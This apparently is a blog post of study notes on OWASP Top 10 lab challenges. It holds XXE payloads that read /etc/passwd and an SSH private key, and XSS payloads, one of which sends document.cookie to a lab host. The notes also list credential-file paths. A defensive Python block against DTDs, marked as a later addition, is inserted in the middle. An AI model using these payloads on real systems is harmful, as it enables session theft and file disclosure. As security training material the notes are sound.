Certified Ethical Hacker: Useful Links and Summary

goay xuan hui
2 min read · Apr 6, 2021

Useful Tools

OWASP Top 10

Severity 1: OS Command Injection

Folders:
<user directory>/.ssh/id_rsa - Where the private key is stored
/etc/passwd - Stores user information
/etc/os-release - Stores OS information

Commands:
pwd - Show the current working directory
whoami - Show the current user
cat /etc/passwd | grep "www-data" - Only show output lines containing "www-data"
grep -r "MOTD" /etc - Search all files under the /etc directory for "MOTD"

Severity 2: Broken Authentication

Severity 3: Sensitive Data Exposure

  • Locate hidden directories on the website by using the Target feature in Burp Suite.
  • Retrieve sensitive information from the database.
root@ip-10-10-255-70:~# file webapp.db >>> To check the filetype
root@ip-10-10-255-70:~# sqlite3 webapp.db >>> To access the database
sqlite> .tables >>> To see what tables are available
sqlite> pragma table_info(users); >>> To list the columns of a particular table
sqlite> select * from users; >>> To list all contents from a particular table

Severity 4: XML External Entity

This challenge abuses an XML vulnerability through the use of an ENTITY declaration:

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:/home/falcon/.ssh/id_rsa'>]>
<root>&read;</root>
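
A defensive counterpart to the payloads above, as an added example that is not part of the original post: a Python wrapper that refuses any document carrying a DOCTYPE, so the `read` entity is never declared or resolved. The names `safe_parse`, `is_rejected` and `ForbiddenXML` are hypothetical, and the benign sample is constructed.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class ForbiddenXML(ValueError):
    """Raised when untrusted XML carries a DTD (and therefore may declare entities)."""


def _reject_doctype(name, sysid, pubid, has_internal_subset):
    # ENTITY declarations can only live inside a DTD, so refusing the
    # DOCTYPE blocks external entities and entity-expansion tricks alike.
    raise ForbiddenXML(f"DOCTYPE declaration not allowed (root element {name!r})")


def safe_parse(xml_text: str) -> ET.Element:
    """Parse untrusted XML only if it contains no DOCTYPE declaration."""
    # Pass 1: a bare expat parser whose only job is to abort on a DTD.
    # Exceptions raised inside expat handlers propagate out of Parse().
    checker = xml.parsers.expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    checker.Parse(xml_text, True)
    # Pass 2: the document is DTD-free, so build the tree normally.
    return ET.fromstring(xml_text)


def is_rejected(xml_text: str) -> bool:
    """Return True when safe_parse refuses the document."""
    try:
        safe_parse(xml_text)
    except ForbiddenXML:
        return True
    return False


# First payload from the post above, reproduced as test input.
XXE_PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>"""

# Constructed benign document with no DTD.
BENIGN = """<?xml version="1.0"?>
<root>hello</root>"""

if __name__ == "__main__":
    print("payload rejected:", is_rejected(XXE_PAYLOAD))
    print("benign text:", safe_parse(BENIGN).text)
```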

Severity 5: Broken Access Control

This challenge exploits Insecure Direct Object Reference (IDOR), which is the act of exploiting a misconfiguration in the way user input is handled.

How?

  • Change the URL’s variable manually OR
  • Use the Intruder feature in Burp Suite.

Severity 6: Security Misconfiguration

  • This challenge addresses the leakage of sensitive data on a public database like GitHub.

Severity 7: Cross-site Scripting (XSS)

XSS is a vulnerability commonly found in web applications that allows an attacker to inject malicious scripts and have them executed on the user’s machine due to improper sanitization.

There are different types of XSS vulnerabilities:

  • Stored XSS — This can often be exploited by injecting a malicious script into the web application's database or comments section.
  • Reflected XSS — The malicious payload is part of the victim's request to the website. The attacker would need to trick a victim into clicking the malicious URL.
  • DOM XSS — For DOM XSS, an attacker’s payload will only be executed when the website’s legitimate JavaScript code is executed.
<a href="www.google.com"> Click on this link </a>
<script>alert(document.cookie)</script>
<script>alert(window.location.hostname)</script>
<script>document.querySelector('#thm-title').textContent='I am a hacker'</script>
<script>document.location='http://10.10.88.170/log'+document.cookie</script>
<img src="x" onerror="alert('HHelloello')">
